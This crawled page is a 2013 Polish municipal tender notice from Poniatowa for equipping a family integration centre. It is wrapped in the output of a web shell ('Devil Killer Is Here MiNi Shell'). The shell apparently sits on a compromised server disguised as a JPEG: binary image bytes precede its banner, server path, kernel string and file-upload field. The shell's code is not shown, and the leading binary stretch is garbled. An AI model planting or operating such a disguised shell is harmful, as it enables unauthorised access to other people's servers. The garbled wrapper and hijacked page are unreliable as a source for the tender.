JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130712/141647-N-2013.html

<p class="kh_header"><b>Poniatowa: Zakup i dostawa wyposażenia dla Centrum Integracji Rodzin w Niezabitowie w ramach projektu: Utworzenie Centrum Integracji Rodzin w miejscowości Niezabitów</b><br>
<b>Numer ogłoszenia: 141647 - 2013; data zamieszczenia: 12.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Poniatowa , ul. Młodzieżowa 2, 24-320 Poniatowa, woj. lubelskie, tel. 081 8204162 w. 15, faks 081 8203573.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.poniatowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa wyposażenia dla Centrum Integracji Rodzin w Niezabitowie w ramach projektu: Utworzenie Centrum Integracji Rodzin w miejscowości Niezabitów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa wyposażenia dla Centrum Integracji Rodzin w Niezabitowie.
Projekt objęty jest pomocą w ramach działania 413  Wdrażanie Lokalnych Strategii Rozwoju w zakresie operacji odpowiadających warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi objętego  Programem Rozwoju Obszarów Wiejskich  na lata 2007 - 2013  
II.	Wyposażenie będące przedmiotem zamówienia stanowi cztery części asortymentu obejmującego:
1)	sprzęt RTV i AGD
2)	urządzenia sportowe
3)	meble
4)	wyposażenie jadalni
Zamawiający dopuszcza możliwość składania ofert częściowych. W przypadku składania oferty częściowej, wykonawca wypełnia  część formularza ofertowego (załącznik nr 1 do SIWZ) oraz część formularza cenowego (załącznik nr 2 do SIWZ ) dotyczącą wybranego asortymentu, który będzie przedmiotem składanej przez niego oferty. Oferta może obejmować jeden, dwa, trzy lub wszystkie cztery części (asortymenty) zamówienia.
III.	Zamawiający wymaga, aby asortyment wchodzący w skład każdej z części przedmiotu zamówienia był nieużywany, sprawny, pochodzący z legalnego źródła oraz objęty był gwarancją (zgodnie z zasadami  gwarancji udzielanej przez producenta). Wykonawca wybrany do realizacji zamówienia w danej części zobowiązany będzie do udokumentowania pochodzenia dostarczonego asortymentu oraz przekazania kart gwarancyjnych i instrukcji użytkowania sprzętu. Zamawiający wymaga, aby dostarczony sprzęt wymagający instalacji - podłączenia , został zainstalowany w docelowym miejscu użytkowania przez upoważnionego pracownika Wykonawcy.
Wykonawca części 1, 2, 3 udziela Zamawiającemu gwarancji jakości na dostarczony przedmiot umowy przez okres 24 miesięcy licząc od dnia dokonania przekazania przedmiotu umowy, niezależnie od gwarancji udzielonej przez producenta

1)Część dotycząca zamówienia na zakup i dostawę sprzętu AGD i elektronicznego zgodnie z wykazem:
LpNazwa produktu/towaru	opis	Ilość szt
1.Lodówka	klasa energetyczna od A do A+, 2 drzwiowa, kolor biały, minimalna pojemność 240 l	2
2.Kunchenka mikrofalowa	min.poj. 20 l, min. moc 800 WAT kolor biały	2
3.Czajnik elektryczny	min.poj 1,7 l, min. Moc 2000 WAT, kolor biały	2
4.Robot kuchenny	malakser wielofunkcyjny, min. moc 400 WAT, kolor biały.	3
5.Krajalnica duża	stal nierdzewna, silnik chłodzony powietrzem, średnica noża 250 - 300 mm	1
6.Krajalnica mała	moc od 190 do 200 WAT, regulacja grubości krojenia	1
7.Odkurzacz	moc od 1700 do 2100 WAT	1
8.Piekarnik elektryczny podwójny	dwupoziomowy, moc od 800 do 1000 WAT	3
9.Termos elektryczny 10 l 	z kranem, stal nierdzewna, 230 V	1

2) Część dotycząca zamówienia na zakup i dostawę urządzeń sportowych zgodnie z wykazem:
LpNazwa produktu/towaru	opis	Ilość szt
1.Atlas do ćwiczeń 	G 570 York lub równoważny	1
2.Gryf prosty do wyciskania długi	długość min 200 cm,	1
3.Gryf łamany	długość min 120 cm	1
4.Gryf prosty krótki	długość min. 35 cm	1
5.Expander gumowy 	ilośc żył od 1 do 5, długość min. 50 cm	2
6.Hantelek winylowy 2 kg	żeliwny, pokryty winylem	2
7.Hantelek winylowy 3 kg	żeliwny, pokryty winylem	2
8.Gryfiki	gwintowane, chromowane	4
9.Talerz na gryf 20 kg	żeliwny	4
10.Talerz na gryf 15 kg	żeliwny	2
11.Talerz na gryf 10 kg	żeliwny	4
12.Talerz na gryf 5 kg	żeliwny	8
13.Talerz na gryf 2,5 kg	żeliwny	4
14.Talerz na gryf 1,25 kg	żeliwny	4
15.Drążek rozporowy	regulowany, stal chromowana	1
16.Steper	siłowniki hydrualiczne	1
17.		Zestaw gryfów i obciążeń 50 kg	talerze żeliwne, gryfy niklowane, gwintowane	1
18.Piłka do nogi 	rozmiar 5	1

3)Część dotycząca zamówienia na zakup i dostawę mebli zgodnie z wykazem:
Lp	Nazwa produktu/towaru	opis	Ilość szt
1.Meble do świetlicy	2x szafki stojące z min. 2 półkami zamykane, wys. Min 150 cm, szerokość min 80 cm, 2x stoliki min dł. 150 m.	1 kpl
2.Krzesła do świetlicy 	składane, stelaż metalowy	20
3.Krzesła biurowe 	drewno, miękkie siedziska	30
4.Stół konferencyjny 	płyta laminowana , dł. min. 300 cm szer. min. 80 cm	1
5.Meble biurowe 	meblościanka z płyty laminowanej, wysokość 196 cm, szerokość 300 cm, głębokość 55 cm	1
6.Regał  kuchenny	zestaw szafek i pólek z płyty laminowanej, dł szafek 270 cm do 300 cm, blat 38 mm, góra 90cm/40cm/80cm, dół 90cm/40cm/60cm/80 cm 	1 kpl
7.Krzesła stołowe	drewno, miękkie siedziska	200
8.		Stoły kuchenne	blat ze stali nierdzewnej, dł. 200 x 80 cm	2
9.		Stoły bankietowe	dł. 200 x 80 cm , możliwość składanych nóg
wykonane z płyty MDF
	10
Kolor drewna buk naturalny lub podobne, kolor obicia tapicerskiego należy uzgodnić z Zamawiającym na etapie realizacji zadania.

4) Część dotycząca zamówienia na zakup i dostawę wyposażenia jadalni zgodnie z wykazem:
LpNazwa produktu/towaru	opis	Ilość szt
10.Zestaw misek plastikowych	miski okrągłe, min.poj. 20 l	4
11.Garnki duże  50 l z pokrywa 	poj. 50 litrów, stal nierdzewna	1
12.Garnek 36 l z pokrywa 	poj. 36 litrów, stal nierdzewna	2
13.Garnek 21 l z pokrywa 	poj. 21 litrów, stal nierdzewna	2
14.Garnek 12 l z pokrywa 	poj. 12 litrów, stal nierdzewna	2
15.Garnek 6,6 l z pokrywa 	poj. 6,6 litrów, stal nierdzewna	2
16.Łyżki wazowe	stal nierdzewna	5
17.Cedzaki	stal nierdzewna	3
18.Zestaw noży 3 szt	wysokiej jakości stal nierdzewna	3
19.Brytfanki do pieczenia 	prostokoątna	15
20.Deski drewniane do krojenia duże	drewno	10
21.Dzbanki na soki	poj. min. 1,6 l, szkło bezbarwne	20
22.Serwetniki	drut lub stal chromowana	20
23.Taca metalowa duża	stal nierdzewna	10
24.Flakony na kwiaty	Szkło bezbarwne	10
25.Piramida na owoce	szkło oraz stal nierdzewna	10
26.Klosze na ciasto	wysokiej jakości szkło	10
27.Literatki 6 szt	Szkło bezbarwne wysokiej jakości	34
28.Talerze duże obiadowe płytkie	średnica min. 25 cm, białe	200
29.Talerze duże obiadowe głębokie 	średnica min. 22 cm, białe	200
30.talerze małe płytkie	średnica min. 16 cm, białe	200
31.Telerze deserowe	średnica min. 19 cm, białe	200
32.Bulionówka 	poj. od 250 do 320 ml 	200
33.Półmiski na wędlinę duże	średnica min. 30 cm, owalny, białe	20
34.Półmiski na rybę duże	średnica min. 30 cm owalny	20
35.Półmiski na śledzie małe	średnica min. 20 cm owalny, 	20
36.Salaterki duże	średnica min. 20 cm, szkło lub porcelana	20
37.Salaterki małe	średnica min. 16 cm, szkło lub porcelana	20
38.Łyżeczka do herbaty	stal, wzór gładki, kolor srebrny	200
39.Łyżka do zupy	stal, kolor srebrny, wzór gładki,	200
40.Widelec	stal, kolor srebrny, wzór gładki,	200
41.Nóż	stal, kolor srebrny, wzór gładki,	200
42.Miski 6 l	Stal, kolor srebrny	4
43.Szklanki z uchem 	szkło hartowane bezbarwne	200
44.Waza na zupę	porcelana, kolor biały, min. poj. 3 l	10
45.Zestaw do przypraw (pieprz+sól+ ocet)	szklany, 3 elementowy	10
46.Obrusy 	materiał plamoodporny, 120 x 250 cm, białe	20
47.Dywan do świetlicy 	3x4m, ciepłe kolory- ciemny niebieski, we wzory	1
48.Ścierki kuchenne	bawełna	20
49.Czajnik zwykły	poj. od 2 do 2,5 l, stal nierdzewna	2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9, 37.40.00.00-2, 39.00.00.00-2, 39.13.00.00-2, 39.14.10.00-2, 39.14.32.00-8, 39.20.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla poszczególnych części przedmiotu zamówienia w wysokości: 
1)	sprzęt RTV i AGD			200,00 zł
2)	urządzenia sportowe			250,00 zł
3)	meble				         1 000,00 zł
4)	wyposażenie jadalni			300,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.poniatowa.pl/BIP<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Młodzieżowa 2, 24-320 Poniatowa, pokój nr 204.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2013 godzina 12:00, miejsce: ul. Młodzieżowa 2, 24-320 Poniatowa, pokój nr 103 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt objęty jest pomocą w ramach działania 413  Wdrażanie Lokalnych Strategii Rozwoju w zakresie operacji odpowiadających warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi objętego  Programem Rozwoju Obszarów Wiejskich  na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1)	Część dotycząca zamówienia na zakup i dostawę sprzętu AGD i elektronicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa produktu/towaru	opis	Ilość szt
1.		Lodówka	klasa energetyczna od A do A+, 2 drzwiowa, kolor biały, minimalna pojemność 240 l	2
2.		Kunchenka mikrofalowa	min.poj. 20 l, min. moc 800 WAT kolor biały	2
3.		Czajnik elektryczny	min.poj 1,7 l, min. Moc 2000 WAT, kolor biały	2
4.		Robot kuchenny	malakser wielofunkcyjny, min. moc 400 WAT, kolor biały.	3
5.		Krajalnica duża	stal nierdzewna, silnik chłodzony powietrzem, średnica noża 250 - 300 mm	1
6.		Krajalnica mała	moc od 190 do 200 WAT, regulacja grubości krojenia	1
7.		Odkurzacz	moc od 1700 do 2100 WAT	1
8.		Piekarnik elektryczny podwójny	dwupoziomowy, moc od 800 do 1000 WAT	3
9.		Termos elektryczny 10 l 	z kranem, stal nierdzewna, 230 V	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część dotycząca zamówienia na zakup i dostawę urządzeń sportowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa produktu/towaru	opis	Ilość szt
1.		Atlas do ćwiczeń 	G 570 York lub równoważny	1
2.		Gryf prosty do wyciskania długi	długość min 200 cm,	1
3.		Gryf łamany	długość min 120 cm	1
4.		Gryf prosty krótki	długość min. 35 cm	1
5.		Expander gumowy 	ilośc żył od 1 do 5, długość min. 50 cm	2
6.		Hantelek winylowy 2 kg	żeliwny, pokryty winylem	2
7.		Hantelek winylowy 3 kg	żeliwny, pokryty winylem	2
8.		Gryfiki	gwintowane, chromowane	4
9.		Talerz na gryf 20 kg	żeliwny	4
10.		Talerz na gryf 15 kg	żeliwny	2
11.		Talerz na gryf 10 kg	żeliwny	4
12.		Talerz na gryf 5 kg	żeliwny	8
13.		Talerz na gryf 2,5 kg	żeliwny	4
14.		Talerz na gryf 1,25 kg	żeliwny	4
15.		Drążek rozporowy	regulowany, stal chromowana	1
16.		Steper	siłowniki hydrualiczne	1
17.		Zestaw gryfów i obciążeń 50 kg	talerze żeliwne, gryfy niklowane, gwintowane	1
18.		Piłka do nogi 	rozmiar 5	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 3)	Część dotycząca zamówienia na zakup i dostawę mebli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa produktu/towaru	opis	Ilość szt
1.		Meble do świetlicy	2x szafki stojące z min. 2 półkami zamykane, wys. Min 150 cm, szerokość min 80 cm, 2x stoliki min dł. 150 m.	1 kpl
2.		Krzesła do świetlicy 	składane, stelaż metalowy	20
3.		Krzesła biurowe 	drewno, miękkie siedziska	30
4.		Stół konferencyjny 	płyta laminowana , dł. min. 300 cm szer. min. 80 cm	1
5.		Meble biurowe 	meblościanka z płyty laminowanej, wysokość 196 cm, szerokość 300 cm, głębokość 55 cm	1
6.		Regał  kuchenny	zestaw szafek i pólek z płyty laminowanej, dł szafek 270 cm do 300 cm, blat 38 mm, góra 90cm/40cm/80cm, dół 90cm/40cm/60cm/80 cm 	1 kpl
7.		Krzesła stołowe	drewno, miękkie siedziska	200
8.		Stoły kuchenne	blat ze stali nierdzewnej, dł. 200 x 80 cm	2
9.		Stoły bankietowe	dł. 200 x 80 cm , możliwość składanych nóg
wykonane z płyty MDF
	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2, 39.13.00.00-2, 39.14.10.00-2, 39.14.32.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część dotycząca zamówienia na zakup i dostawę wyposażenia jadalni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa produktu/towaru	opis	Ilość szt
10.		Zestaw misek plastikowych	miski okrągłe, min.poj. 20 l	4
11.		Garnki duże  50 l z pokrywa 	poj. 50 litrów, stal nierdzewna	1
12.		Garnek 36 l z pokrywa 	poj. 36 litrów, stal nierdzewna	2
13.		Garnek 21 l z pokrywa 	poj. 21 litrów, stal nierdzewna	2
14.		Garnek 12 l z pokrywa 	poj. 12 litrów, stal nierdzewna	2
15.		Garnek 6,6 l z pokrywa 	poj. 6,6 litrów, stal nierdzewna	2
16.		Łyżki wazowe	stal nierdzewna	5
17.		Cedzaki	stal nierdzewna	3
18.		Zestaw noży 3 szt	wysokiej jakości stal nierdzewna	3
19.		Brytfanki do pieczenia 	prostokoątna	15
20.		Deski drewniane do krojenia duże	drewno	10
21.		Dzbanki na soki	poj. min. 1,6 l, szkło bezbarwne	20
22.		Serwetniki	drut lub stal chromowana	20
23.		Taca metalowa duża	stal nierdzewna	10
24.		Flakony na kwiaty	Szkło bezbarwne	10
25.		Piramida na owoce	szkło oraz stal nierdzewna	10
26.		Klosze na ciasto	wysokiej jakości szkło	10
27.		Literatki 6 szt	Szkło bezbarwne wysokiej jakości	34
28.		Talerze duże obiadowe płytkie	średnica min. 25 cm, białe	200
29.		Talerze duże obiadowe głębokie 	średnica min. 22 cm, białe	200
30.		talerze małe płytkie	średnica min. 16 cm, białe	200
31.		Telerze deserowe	średnica min. 19 cm, białe	200
32.		Bulionówka 	poj. od 250 do 320 ml 	200
33.		Półmiski na wędlinę duże	średnica min. 30 cm, owalny, białe	20
34.		Półmiski na rybę duże	średnica min. 30 cm owalny	20
35.		Półmiski na śledzie małe	średnica min. 20 cm owalny, 	20
36.		Salaterki duże	średnica min. 20 cm, szkło lub porcelana	20
37.		Salaterki małe	średnica min. 16 cm, szkło lub porcelana	20
38.		Łyżeczka do herbaty	stal, wzór gładki, kolor srebrny	200
39.		Łyżka do zupy	stal, kolor srebrny, wzór gładki,	200
40.		Widelec	stal, kolor srebrny, wzór gładki,	200
41.		Nóż	stal, kolor srebrny, wzór gładki,	200
42.		Miski 6 l	Stal, kolor srebrny	4
43.		Szklanki z uchem 	szkło hartowane bezbarwne	200
44.		Waza na zupę	porcelana, kolor biały, min. poj. 3 l	10
45.		Zestaw do przypraw (pieprz+sól+ ocet)	szklany, 3 elementowy	10
46.		Obrusy 	materiał plamoodporny, 120 x 250 cm, białe	20
47.		Dywan do świetlicy 	3x4m, ciepłe kolory- ciemny niebieski, we wzory	1
48.		Ścierki kuchenne	bawełna	20
49.		Czajnik zwykły	poj. od 2 do 2,5 l, stal nierdzewna	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.20.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
